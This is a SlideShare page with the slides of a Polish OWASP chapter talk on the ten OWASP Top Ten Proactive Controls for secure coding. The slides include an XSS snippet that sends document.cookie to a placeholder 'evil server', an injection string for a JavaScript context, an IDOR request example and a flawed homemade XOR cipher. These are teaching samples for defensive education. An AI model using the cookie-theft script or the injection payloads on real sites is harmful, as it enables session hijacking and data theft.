Mateusz Olejarka, profile picture
Uploaded byMateusz Olejarka
PPTX, PDF456 views

Ten Commandments of Secure Coding

The document outlines the OWASP Top Ten Proactive Controls for secure coding, emphasizing practices such as input validation, parameterization, and access control to mitigate security vulnerabilities. It highlights the importance of education for developers in application security and provides best practices for each commandment. The summary concludes that while these practices are crucial, each application should have its own risk profile tailored to its specific threats.

Download to read offline
Ten Commandments of Secure Coding OWASP Top Ten Proactive Controls Mateusz Olejarka OWASP Poland
Mateusz Olejarka @molejarka • Senior IT Security Consultant @SecuRing • Ex-developer • OWASP Poland since 2011
OWASP O = Open • Docs & tools – free – Creative Commons license – open source • Build with open collaboration in mind – Each one of you can join 3
OWASP Poland Chapter • Since 2007 • Meetings: Kraków, Poznań, Warszawa • Free entry • Supporters:
4Developers 2014* questionnaire * SecuRing’s study „Praktyki wytwarzania bezpiecznego oprogramowania w polskich firmach – 2014” • 62% companies do not educate programmers on application security • >50% companies do not consider security during the design stage • 73% participants confirmed, that they fixed security related issues • only 42% confirmed, that they do security testing before production deployment
OWASP Top10 Risk vs OWASP Top10 Proactive Controls
Disclaimer • Do not rely your application security on Top 10 * – It is purely educational material – Each application has its own risk profile
Thou shalt parametrize queries 1: Parametrize queries
SQL/LDAP/XML/cmd/…-injection Easily exploitable • Simple to use tools exist Devastating impact Źródło: http://xkcd.com/327/
Best practices #1 Prepared Statements / Parametrized Queries #2 Stored Procedures – Watch for exeptions! (eval,dynamic block, etc.) #3 Escaping – risky! String newName = request.getParameter("newName"); String id = request.getParameter("id"); PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); pstmt.setString(1, newName); pstmt.setString(2, id);
References • Bobby Tables: A guide to preventing SQL injection • Query Parameterization Cheat Sheet • SQL Injection Prevention Cheat Sheet • OWASP Secure Coding Practices Quick Reference Guide
2: Thou shalt encode data 2: Encode Data
XSS • Site defacement • Session hijacking <script>document.body.innerHTML(“Jim was here”);</script> <script> var img = new Image(); img.src="http://<some evil server>.com?” + document.cookie; </script>
Results of missing encoding • Session hijacking • Network scanning • CSRF prevention bypass • Site defacement (browser) • … • Browser hijack – vide BeEF
Cross Site Scripting But when we write output inside pure JavaScript: <script> var split='<bean:write name="transferFormId" property="trn_recipient">'; splitRecipient(split); </script> trn_recipient=';alert('xss');-- <script> var split='';alert('xss');--
Best practices • Special character encoding has to be context aware – HTML element – HTML attribute – JavaScript – JSON – CSS / style – URL
References • XSS (Cross Site Scripting) Prevention Cheat Sheet • Java Encoder Project • Microsoft .NET AntiXSS Library • OWASP ESAPI • Encoder Comparison Reference Project
Thou shalt validate all inputs 3: Validate All Inputs
Why validate anything? • Most of other vulnerabilities (np. injections, xss, …) occurs (also) from missing input validation • Validation it is like firewall – Do not protects you agains everything – …but nice to have
Best practices • Prefer whitelist over blacklist approach, • Use strongly typed fields – One validator per one data type – Easier to integrate a WAF • Validation = first line of defence – For exaple type casting prevents injection – But not the only one!
References • Input Validation Cheat Sheet • Apache Commons Validator • OWASP JSON Sanitizer Project • OWASP Java HTML Sanitizer Project • Google Caja
Thou shalt implement appropriate access controls 4: Implement Appropriate Access Controls
Account history
HTTP request GET /services/history/account/85101022350445200448009906 HTTP/1.1 SA-DeviceId: 940109f08ba56a89 SA-SessionId: 826175 Accept: application/json Host: acc Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) GET /services/history/account/45101022350445200448005388 HTTP/1.1 SA-DeviceId: 940109f08ba56a89 SA-SessionId: 826175 Accept: application/json Host: acc Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) Account id change – we get other user data
Best practices • Server makes a final call! • Default deny • All request must go through access controll – centralized, easy to use mechanism • Access control rules (policy) should be separated from code – Not a part of it
if (currentUser.hasRole(“administrator”)) { //pozwol } else { //zabron } If (currentUser.isPermitted(printPermission)) { //pozwol } else { //zabron }
References • Access Control Cheat Sheet • Java Authorization Guide with Apache Shiro – Apache Shiro Authorization features • OWASP PHPRBAC Project
Thou shalt establish identity and authentication controls 5: Establish Identity and Authentication Controls
Example vulnerability • Authentication with locally stored key (on the machine) • Process: 1. Enter login 2. Select key file,enter key password 3. We are logged in https://...../GenerateNewKey
Best practices • Check access control for the functions allowing to change authentication credentials • „chain of trust” rule • Watch for session at the border! • Do not limit length and characters to use in password
References • Authentication Cheat Sheet • Password Storage Cheat Sheet • Forgot Password Cheat Sheet • Session Management Cheat Sheet
Thou shalt protect data and privacy 6: Protect Data and Privacy
Example (at transit) • SSL covers encryption and authentication • What verifies servers identity? – Web applications: Browser – Mobile / thick-client / embedded… application: Application • Common errors – Missing certificate validation – Brak sprawdzenia certyfikatu lub „łańcucha zaufania” – Missing exception handling
Best practices (in transit) • TLS • For whole application • Cookies: „Secure” flag • HTTP Strict Transport Security • Strong cipher suites • Chain of trust • Certificate pinning
References (in transit) • Transport Layer Protection Cheat Sheet • Pinning Cheat Sheet • OWASP O-Saft (SSL Audit for Testers)
Example (at rest) • Storing password • „Own” SHA1 function public static String encrypt(byte [] in) { String out = ""; for(int i = 0; i < in.length; i++) { byte b = (byte)(in[i] ^ key[i%key.length]); out += "" + hexDigit[(b & 0xf0)>>4] + hexDigit[b & 0x0f]; } return out; }
Best practices(at rest) • Do not reinwent the wheel! – Home-bred ciphers are evil – Own crypto is evil – Only libraries with reputation! • Strong ciphers in strong modes – ECB is evil – CBC – watch for „padding oracle” • Good RNG for IV
References • Google KeyCzar • Cryptographic Storage Cheat Sheet • Password Storage Cheat Sheet
Thou shalt implement logging, error handling and intrusion detection 7: Implement Logging, Error Handling and Intrusion Detection
References • Logging Cheat Sheet • OWASP AppSensor Project
Thou shalt leverage security features of frameworks and security libraries 8: Leverage Security Features of Frameworks and Security Libraries
Refenences • PHP Security Cheat Sheet • .NET Security Cheat Sheet • Spring Security • Apache Shiro • OWASP Dependency Check / Track
Thou shalt include security- specific requirements 9: Include Security-Specific Requirements
Building requirements • Attack scenatios – How threats can reach the objectives? – Requires experience and expertise • Selection of security controls == REQUIREMENTS Threat Results Attack scenarios Who? How? What?
References • OWASP Application Security Verification Standard Project • Software Assurance Maturity Model • Business Logic Security Cheat Sheet • Testing for business logic (OWASP-BL-001)
Thou shalt design and architect security in 10: Design and Architect Security In
References • Software Assurance Maturity Model (OpenSAMM) • Application Security Verification Standard Project • Application Security Architecture Cheat Sheet • Attack Surface Analysis Cheat Sheet • Threat Modeling Cheat Sheet
Summary
That was just the Top Ten! • Each application is different – Risk profile should be defined (WHO? WHY?) – Consider „compliance with existing regulations” • Few easy steps with big positive impact • Developers education is worth it!
OWASP meetings • https://www.owasp.org/index.php/Poland • Mailing list • Facebook: OWASP Poland Local Chapter • Twitter: @owasppoland
Thank you! Mateusz Olejarka @molejarka mateusz.olejarka@owasp.org

More Related Content

PPTX
Security Testing - Zap It
byManjyot Singh
 
PDF
Security Testing using ZAP in SFDC
byThinqloud
 
PDF
Security Automation using ZAP
byVaibhav Gupta
 
PDF
Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha...
byChristian Schneider
 
PPTX
The OWASP Zed Attack Proxy
byAditya Gupta
 
PPTX
Security Code Review 101
byPaul Ionescu
 
PPTX
Zap vs burp
byTomasz Fajks
 
PDF
Zed Attack Proxy (ZAP)
byJAINAM KAPADIYA
 
Security Testing - Zap It
byManjyot Singh
 
Security Testing using ZAP in SFDC
byThinqloud
 
Security Automation using ZAP
byVaibhav Gupta
 
Security DevOps - Free pentesters' time to focus on high-hanging fruits // Ha...
byChristian Schneider
 
The OWASP Zed Attack Proxy
byAditya Gupta
 
Security Code Review 101
byPaul Ionescu
 
Zap vs burp
byTomasz Fajks
 
Zed Attack Proxy (ZAP)
byJAINAM KAPADIYA
 

What's hot

PPTX
Zed attack proxy [ What is ZAP(Zed Attack Proxy)? ]
byraj upadhyay
 
PPTX
Learn to pen-test with OWASP ZAP
byPaul Ionescu
 
PPTX
Java Secure Coding Practices
byOWASPKerala
 
PDF
Web security and OWASP
byIsuru Samaraweera
 
ODP
2014 ZAP Workshop 2: Contexts and Fuzzing
bySimon Bennetts
 
PPTX
Devouring Security Insufficient data validation risks Cross Site Scripting
bygmaran23
 
PPTX
Software Development in the Age of Breaches
byKarthik Bhat
 
PDF
Owasp zap
byColdFusionConference
 
PPTX
Owasp Top 10 - A1 Injection
byPaul Ionescu
 
PDF
OWASP Portland - OWASP Top 10 For JavaScript Developers
byLewis Ardern
 
ODP
OWASP 2013 APPSEC USA Talk - OWASP ZAP
bySimon Bennetts
 
ODP
Practical Security Testing for Developers using OWASP ZAP at Dot Net Bangalor...
bygmaran23
 
ODP
OWASP Zed Attack Proxy Demonstration - OWASP Bangalore Nov 22 2014
bygmaran23
 
PPTX
Spa Secure Coding Guide
byGeoffrey Vandiest
 
PDF
Security in practice with Java EE 6 and GlassFish
byMarkus Eisele
 
PDF
How to avoid top 10 security risks in Java EE applications and how to avoid them
byMasoud Kalali
 
PDF
OWASP London - So you thought you were safe using AngularJS.. Think again!
byLewis Ardern
 
ODP
BSides Manchester 2014 ZAP Advanced Features
bySimon Bennetts
 
PPTX
Owasp & Asp.Net
byÖnsel Akın
 
PDF
Secure code
byddeogun
 
Zed attack proxy [ What is ZAP(Zed Attack Proxy)? ]
byraj upadhyay
 
Learn to pen-test with OWASP ZAP
byPaul Ionescu
 
Java Secure Coding Practices
byOWASPKerala
 
Web security and OWASP
byIsuru Samaraweera
 
2014 ZAP Workshop 2: Contexts and Fuzzing
bySimon Bennetts
 
Devouring Security Insufficient data validation risks Cross Site Scripting
bygmaran23
 
Software Development in the Age of Breaches
byKarthik Bhat
 
Owasp zap
byColdFusionConference
 
Owasp Top 10 - A1 Injection
byPaul Ionescu
 
OWASP Portland - OWASP Top 10 For JavaScript Developers
byLewis Ardern
 
OWASP 2013 APPSEC USA Talk - OWASP ZAP
bySimon Bennetts
 
Practical Security Testing for Developers using OWASP ZAP at Dot Net Bangalor...
bygmaran23
 
OWASP Zed Attack Proxy Demonstration - OWASP Bangalore Nov 22 2014
bygmaran23
 
Spa Secure Coding Guide
byGeoffrey Vandiest
 
Security in practice with Java EE 6 and GlassFish
byMarkus Eisele
 
How to avoid top 10 security risks in Java EE applications and how to avoid them
byMasoud Kalali
 
OWASP London - So you thought you were safe using AngularJS.. Think again!
byLewis Ardern
 
BSides Manchester 2014 ZAP Advanced Features
bySimon Bennetts
 
Owasp & Asp.Net
byÖnsel Akın
 
Secure code
byddeogun
 

Similar to Ten Commandments of Secure Coding

PPTX
OWASP_Top_Ten_Proactive_Controls_v2.pptx
byFernandoVizer
 
PPT
Top Ten Proactive Web Security Controls v5
byJim Manico
 
PDF
OWASP Top 10 (2010 release candidate 1)
byJeremiah Grossman
 
PDF
Secure coding presentation Oct 3 2020
byMoataz Kamel
 
PPTX
Securing your web applications a pragmatic approach
byAntonio Parata
 
PDF
Security Awareness
byLucas Hendrich
 
PDF
2013 OWASP Top 10
bybilcorry
 
PPTX
Started In Security Now I'm Here
byChristopher Grayson
 
PPTX
Owasp top-ten-mapping-2015-05-lwc
byKaty Anton
 
PDF
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
byPhilippe Gamache
 
PDF
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
byPhilippe Gamache
 
PDF
2015 09-18-jug summer camp
bySebastien Gioria
 
PDF
42 minutes to secure your code....
bySebastien Gioria
 
PDF
Secure coding guidelines
byZakaria SMAHI
 
PPTX
Web Security Overview
byNoah Jaehnert
 
PPTX
OWASP top 10-2013
bytmd800
 
PDF
OWASP Top 10 List Overview for Web Developers
byBenjamin Floyd
 
PPTX
owasp top 10 security risk categories and CWE
byArun Voleti
 
PPT
OWASP Top10 2010
byTommy Tracx Xaypanya
 
PDF
Application Security on a Dime: A Practical Guide to Using Functional Open So...
byPOSSCON
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
byFernandoVizer
 
Top Ten Proactive Web Security Controls v5
byJim Manico
 
OWASP Top 10 (2010 release candidate 1)
byJeremiah Grossman
 
Secure coding presentation Oct 3 2020
byMoataz Kamel
 
Securing your web applications a pragmatic approach
byAntonio Parata
 
Security Awareness
byLucas Hendrich
 
2013 OWASP Top 10
bybilcorry
 
Started In Security Now I'm Here
byChristopher Grayson
 
Owasp top-ten-mapping-2015-05-lwc
byKaty Anton
 
OWASP Top 10 Proactive Controls 2016 - PHP Québec August 2017
byPhilippe Gamache
 
OWASP Top 10 Proactive Controls 2016 - NorthEast PHP 2017
byPhilippe Gamache
 
2015 09-18-jug summer camp
bySebastien Gioria
 
42 minutes to secure your code....
bySebastien Gioria
 
Secure coding guidelines
byZakaria SMAHI
 
Web Security Overview
byNoah Jaehnert
 
OWASP top 10-2013
bytmd800
 
OWASP Top 10 List Overview for Web Developers
byBenjamin Floyd
 
owasp top 10 security risk categories and CWE
byArun Voleti
 
OWASP Top10 2010
byTommy Tracx Xaypanya
 
Application Security on a Dime: A Practical Guide to Using Functional Open So...
byPOSSCON
 

Recently uploaded

PPTX
🚀 Appnigma AI – No-Code Salesforce App Builder for Faster Native Development
byssuser412e60
 
PDF
Insurance-CRM-Software-The-Key-to-Digital-Transformation.pdf
byInsurance Tech Services
 
PDF
Patterns of Patterns and why we need them
bydescri1
 
PPTX
1stCollege Management System (1) .pptx
bygehlotyash2005
 
PDF
School-Hall-Pass-System-Modernizing-Student-Movement-Management.pdf
byinfoswipesolutionsin
 
PDF
"SiyanoAV: Preventing Data Breaches in 2025"
byyogeshchauhanoffice
 
PDF
White-Label Development vs In-House Tech Teams: Key Differences
byShiv Technolabs Pvt. Ltd.
 
PDF
Building production-ready AI Agents with Spring AI and Amazon Bedrock AgentCo...
byVadym Kazulkin
 
PDF
Zoople Technologies: Premier Data Science Institute in Kozhikode
byaromalcsunil761
 
PPTX
Lead Scoring Models in the Wild: What Works & What Doesn’t
bybbedford2
 
PPTX
Python_Lecture13_Introduction to PyQt.pptx
byamanaydana
 
PDF
The future Android App Development in 2025
byLoudOwls Solutions Private Limited
 
PDF
How to Get Premium Capacity Power BI.pdf
byinfodobbsdataconsult
 
PPTX
AI EMR Software Making Healthcare Smarter, Simpler, and More Human
byEasy Clinic
 
PDF
Speculative Automated Refactoring of Imperative Deep Learning Programs to Gra...
byRaffi Khatchadourian
 
PPTX
College Management System.pptx
bygehlotyash2005
 
PPTX
AI in Payroll Automate & Optimize Workforce Management
byMatellio
 
PPTX
AI and Automation Software | Best AI and Automation Software
byEasy Clinic
 
PDF
12 Simple Ways to Attract Direct Bookings.pdf
byHotelogix
 
PDF
Softaken OCR Image to Text Extractor Tool
byaimberdphilomena
 
🚀 Appnigma AI – No-Code Salesforce App Builder for Faster Native Development
byssuser412e60
 
Insurance-CRM-Software-The-Key-to-Digital-Transformation.pdf
byInsurance Tech Services
 
Patterns of Patterns and why we need them
bydescri1
 
1stCollege Management System (1) .pptx
bygehlotyash2005
 
School-Hall-Pass-System-Modernizing-Student-Movement-Management.pdf
byinfoswipesolutionsin
 
"SiyanoAV: Preventing Data Breaches in 2025"
byyogeshchauhanoffice
 
White-Label Development vs In-House Tech Teams: Key Differences
byShiv Technolabs Pvt. Ltd.
 
Building production-ready AI Agents with Spring AI and Amazon Bedrock AgentCo...
byVadym Kazulkin
 
Zoople Technologies: Premier Data Science Institute in Kozhikode
byaromalcsunil761
 
Lead Scoring Models in the Wild: What Works & What Doesn’t
bybbedford2
 
Python_Lecture13_Introduction to PyQt.pptx
byamanaydana
 
The future Android App Development in 2025
byLoudOwls Solutions Private Limited
 
How to Get Premium Capacity Power BI.pdf
byinfodobbsdataconsult
 
AI EMR Software Making Healthcare Smarter, Simpler, and More Human
byEasy Clinic
 
Speculative Automated Refactoring of Imperative Deep Learning Programs to Gra...
byRaffi Khatchadourian
 
College Management System.pptx
bygehlotyash2005
 
AI in Payroll Automate & Optimize Workforce Management
byMatellio
 
AI and Automation Software | Best AI and Automation Software
byEasy Clinic
 
12 Simple Ways to Attract Direct Bookings.pdf
byHotelogix
 
Softaken OCR Image to Text Extractor Tool
byaimberdphilomena
 

Ten Commandments of Secure Coding

  • 1.
    Ten Commandments ofSecure Coding OWASP Top Ten Proactive Controls Mateusz Olejarka OWASP Poland
  • 2.
    Mateusz Olejarka @molejarka •Senior IT Security Consultant @SecuRing • Ex-developer • OWASP Poland since 2011
  • 3.
    OWASP O = Open •Docs & tools – free – Creative Commons license – open source • Build with open collaboration in mind – Each one of you can join 3
  • 4.
    OWASP Poland Chapter •Since 2007 • Meetings: Kraków, Poznań, Warszawa • Free entry • Supporters:
  • 5.
    4Developers 2014* questionnaire *SecuRing’s study „Praktyki wytwarzania bezpiecznego oprogramowania w polskich firmach – 2014” • 62% companies do not educate programmers on application security • >50% companies do not consider security during the design stage • 73% participants confirmed, that they fixed security related issues • only 42% confirmed, that they do security testing before production deployment
  • 6.
    OWASP Top10 Riskvs OWASP Top10 Proactive Controls
  • 7.
    Disclaimer • Do notrely your application security on Top 10 * – It is purely educational material – Each application has its own risk profile
  • 8.
  • 9.
    SQL/LDAP/XML/cmd/…-injection Easily exploitable • Simpleto use tools exist Devastating impact Źródło: http://xkcd.com/327/
  • 10.
    Best practices #1 PreparedStatements / Parametrized Queries #2 Stored Procedures – Watch for exeptions! (eval,dynamic block, etc.) #3 Escaping – risky! String newName = request.getParameter("newName"); String id = request.getParameter("id"); PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?"); pstmt.setString(1, newName); pstmt.setString(2, id);
  • 11.
    References • Bobby Tables:A guide to preventing SQL injection • Query Parameterization Cheat Sheet • SQL Injection Prevention Cheat Sheet • OWASP Secure Coding Practices Quick Reference Guide
  • 12.
    2: Thou shaltencode data 2: Encode Data
  • 13.
    XSS • Site defacement •Session hijacking <script>document.body.innerHTML(“Jim was here”);</script> <script> var img = new Image(); img.src="http://<some evil server>.com?” + document.cookie; </script>
  • 14.
    Results of missingencoding • Session hijacking • Network scanning • CSRF prevention bypass • Site defacement (browser) • … • Browser hijack – vide BeEF
  • 16.
    Cross Site Scripting Butwhen we write output inside pure JavaScript: <script> var split='<bean:write name="transferFormId" property="trn_recipient">'; splitRecipient(split); </script> trn_recipient=';alert('xss');-- <script> var split='';alert('xss');--
  • 17.
    Best practices • Specialcharacter encoding has to be context aware – HTML element – HTML attribute – JavaScript – JSON – CSS / style – URL
  • 18.
    References • XSS (CrossSite Scripting) Prevention Cheat Sheet • Java Encoder Project • Microsoft .NET AntiXSS Library • OWASP ESAPI • Encoder Comparison Reference Project
  • 19.
    Thou shalt validateall inputs 3: Validate All Inputs
  • 20.
    Why validate anything? •Most of other vulnerabilities (np. injections, xss, …) occurs (also) from missing input validation • Validation it is like firewall – Do not protects you agains everything – …but nice to have
  • 21.
    Best practices • Preferwhitelist over blacklist approach, • Use strongly typed fields – One validator per one data type – Easier to integrate a WAF • Validation = first line of defence – For exaple type casting prevents injection – But not the only one!
  • 22.
    References • Input ValidationCheat Sheet • Apache Commons Validator • OWASP JSON Sanitizer Project • OWASP Java HTML Sanitizer Project • Google Caja
  • 23.
    Thou shalt implement appropriateaccess controls 4: Implement Appropriate Access Controls
  • 24.
  • 25.
    HTTP request GET /services/history/account/85101022350445200448009906HTTP/1.1 SA-DeviceId: 940109f08ba56a89 SA-SessionId: 826175 Accept: application/json Host: acc Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) GET /services/history/account/45101022350445200448005388 HTTP/1.1 SA-DeviceId: 940109f08ba56a89 SA-SessionId: 826175 Accept: application/json Host: acc Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) Account id change – we get other user data
  • 26.
    Best practices • Servermakes a final call! • Default deny • All request must go through access controll – centralized, easy to use mechanism • Access control rules (policy) should be separated from code – Not a part of it
  • 27.
    if (currentUser.hasRole(“administrator”)) { //pozwol }else { //zabron } If (currentUser.isPermitted(printPermission)) { //pozwol } else { //zabron }
  • 28.
    References • Access ControlCheat Sheet • Java Authorization Guide with Apache Shiro – Apache Shiro Authorization features • OWASP PHPRBAC Project
  • 29.
    Thou shalt establishidentity and authentication controls 5: Establish Identity and Authentication Controls
  • 30.
    Example vulnerability • Authenticationwith locally stored key (on the machine) • Process: 1. Enter login 2. Select key file,enter key password 3. We are logged in https://...../GenerateNewKey
  • 31.
    Best practices • Checkaccess control for the functions allowing to change authentication credentials • „chain of trust” rule • Watch for session at the border! • Do not limit length and characters to use in password
  • 32.
    References • Authentication CheatSheet • Password Storage Cheat Sheet • Forgot Password Cheat Sheet • Session Management Cheat Sheet
  • 33.
    Thou shalt protectdata and privacy 6: Protect Data and Privacy
  • 34.
    Example (at transit) •SSL covers encryption and authentication • What verifies servers identity? – Web applications: Browser – Mobile / thick-client / embedded… application: Application • Common errors – Missing certificate validation – Brak sprawdzenia certyfikatu lub „łańcucha zaufania” – Missing exception handling
  • 35.
    Best practices (intransit) • TLS • For whole application • Cookies: „Secure” flag • HTTP Strict Transport Security • Strong cipher suites • Chain of trust • Certificate pinning
  • 36.
    References (in transit) •Transport Layer Protection Cheat Sheet • Pinning Cheat Sheet • OWASP O-Saft (SSL Audit for Testers)
  • 37.
    Example (at rest) •Storing password • „Own” SHA1 function public static String encrypt(byte [] in) { String out = ""; for(int i = 0; i < in.length; i++) { byte b = (byte)(in[i] ^ key[i%key.length]); out += "" + hexDigit[(b & 0xf0)>>4] + hexDigit[b & 0x0f]; } return out; }
  • 38.
    Best practices(at rest) •Do not reinwent the wheel! – Home-bred ciphers are evil – Own crypto is evil – Only libraries with reputation! • Strong ciphers in strong modes – ECB is evil – CBC – watch for „padding oracle” • Good RNG for IV
  • 39.
    References • Google KeyCzar •Cryptographic Storage Cheat Sheet • Password Storage Cheat Sheet
  • 40.
    Thou shalt implementlogging, error handling and intrusion detection 7: Implement Logging, Error Handling and Intrusion Detection
  • 41.
    References • Logging CheatSheet • OWASP AppSensor Project
  • 42.
    Thou shalt leveragesecurity features of frameworks and security libraries 8: Leverage Security Features of Frameworks and Security Libraries
  • 43.
    Refenences • PHP SecurityCheat Sheet • .NET Security Cheat Sheet • Spring Security • Apache Shiro • OWASP Dependency Check / Track
  • 44.
    Thou shalt includesecurity- specific requirements 9: Include Security-Specific Requirements
  • 45.
    Building requirements • Attackscenatios – How threats can reach the objectives? – Requires experience and expertise • Selection of security controls == REQUIREMENTS Threat Results Attack scenarios Who? How? What?
  • 46.
    References • OWASP ApplicationSecurity Verification Standard Project • Software Assurance Maturity Model • Business Logic Security Cheat Sheet • Testing for business logic (OWASP-BL-001)
  • 47.
    Thou shalt designand architect security in 10: Design and Architect Security In
  • 48.
    References • Software AssuranceMaturity Model (OpenSAMM) • Application Security Verification Standard Project • Application Security Architecture Cheat Sheet • Attack Surface Analysis Cheat Sheet • Threat Modeling Cheat Sheet
  • 49.
  • 50.
    That was justthe Top Ten! • Each application is different – Risk profile should be defined (WHO? WHY?) – Consider „compliance with existing regulations” • Few easy steps with big positive impact • Developers education is worth it!
  • 51.
    OWASP meetings • https://www.owasp.org/index.php/Poland •Mailing list • Facebook: OWASP Poland Local Chapter • Twitter: @owasppoland
  • 52.